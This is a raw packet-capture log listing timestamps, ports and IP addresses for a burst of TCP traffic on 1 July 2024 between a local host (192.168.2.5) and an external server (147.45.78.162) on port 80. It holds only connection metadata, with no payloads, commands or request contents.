Jul 1, 2024 13:02:14.016025066 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.016060114 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.016081095 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.016119003 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.017137051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.017222881 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.019967079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.020020962 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.020021915 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.020056009 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.020067930 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.020098925 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.020185947 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.020219088 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.020231962 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.020251989 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.020265102 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.020287991 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.020297050 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.020327091 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.021336079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.021388054 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.021465063 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.021498919 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.021522045 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.021552086 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.021574020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.021606922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.021616936 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.021641970 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.021646976 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.021677017 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.021691084 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.021719933 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.024257898 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.024302959 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.024348021 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.024380922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.024385929 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.024418116 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.024629116 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.024677038 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.024681091 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.024714947 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.024740934 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.024749041 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.024755955 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.024791002 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.040291071 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.040338993 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.040339947 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.040355921 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.040385008 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.040396929 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.040512085 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.040527105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.040543079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.040549994 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.040564060 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.040584087 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.040680885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.040726900 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.040757895 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.040772915 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.040787935 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.040796995 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.040803909 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.040815115 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.040819883 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.040822983 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.040836096 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.040844917 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.040863037 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.040873051 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.041553974 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.041596889 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.062239885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.062289000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.062289000 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.062304974 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.062328100 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.062349081 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.062417984 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.062433004 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.062448025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.062458992 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.062474966 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.062500954 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.064913988 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.064966917 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.069391966 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.069446087 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.069448948 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.069478035 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.069493055 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.069519043 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.069602966 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.069634914 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.069652081 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.069669008 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.069689035 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.069703102 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.069715977 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.069746017 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.073497057 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.073529959 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.073550940 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.073565006 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.073570013 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.073609114 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.073631048 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.073664904 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.073679924 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.073697090 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.073710918 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.073733091 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.073785067 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.084089041 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.084162951 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.084182978 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.084218979 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.084233046 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.084254980 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.084271908 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.084307909 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.084335089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.084367037 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.084378004 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.084400892 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.084420919 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.084429979 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.084458113 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.084498882 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.088982105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.088999987 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.089010954 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.089046001 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.089078903 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.089171886 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.089184046 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.089195013 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.089206934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.089215040 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.089235067 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.089267969 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.093136072 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.093189001 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.093195915 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.093208075 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.093231916 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.093250036 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.093326092 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.093338013 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.093348980 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.093374968 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.093393087 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.093630075 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.093674898 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.101460934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.101481915 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.101492882 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.101520061 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.101532936 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.101667881 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.101680040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.101691961 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.101713896 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.101746082 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.101895094 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.101959944 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.102909088 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.102976084 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.102984905 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.102997065 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.103033066 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.103130102 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.103142977 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.103154898 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.103167057 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.103202105 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.103224993 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.109518051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.109575987 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.109590054 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.109600067 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.109632015 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.109647036 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.109678030 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.109689951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.109714985 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.109733105 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.109867096 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.109879017 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.109889984 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.109900951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.109913111 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.109914064 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.109932899 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.109968901 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.110373020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.110384941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.110397100 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.110409021 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.110419989 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.110420942 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.110440016 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.110471964 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.110483885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.110492945 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.110495090 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.110508919 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.110527039 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.110553026 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.110740900 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.110753059 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.110770941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.110780001 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.110784054 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.110816956 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.113774061 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.113821030 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.113822937 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.113835096 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.113873005 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.113888979 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.113924980 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.113936901 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.113948107 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.113960028 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.113967896 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.113984108 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.114017963 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.114160061 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.114207029 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.115539074 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.115591049 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.115601063 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.115612030 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.115638018 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.115659952 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.115731001 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.115745068 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.115756989 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.115770102 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.115787983 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.115812063 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.115839958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.115849972 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.115881920 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.115911961 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.119343042 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.119391918 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.119396925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.119407892 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.119431973 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.119452953 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.119523048 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.119534969 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.119545937 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.119556904 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.119566917 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.119584084 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.119618893 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.134784937 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.134808064 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.134819031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.134866953 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.134921074 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.134958029 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.134975910 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.134987116 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.134999037 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.135004044 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.135034084 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.135061026 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.135279894 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.135292053 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.135303020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.135314941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.135327101 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.135345936 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.135375023 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.135493994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.135539055 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.135565042 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.135576010 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.135601997 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.135621071 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.159537077 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.159596920 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.159596920 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.159631968 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.159645081 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.159681082 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.159765959 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.159800053 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.159813881 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.159833908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.159848928 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.159868002 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.159882069 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.159914970 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.163955927 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.164016962 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.164028883 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.164062977 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.164076090 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.164110899 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.164176941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.164211035 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.164242983 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.164261103 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.164307117 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.164340973 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.164354086 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.164381027 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.167984009 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.168018103 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.168045044 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.168065071 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.168066978 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.168122053 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.168133974 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.168169022 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.168184042 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.168205023 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.168220997 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.168262005 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.168277979 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.168328047 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.178829908 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.178884983 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.178909063 CEST	49705	80	192.168.2.5	147.45.78.162
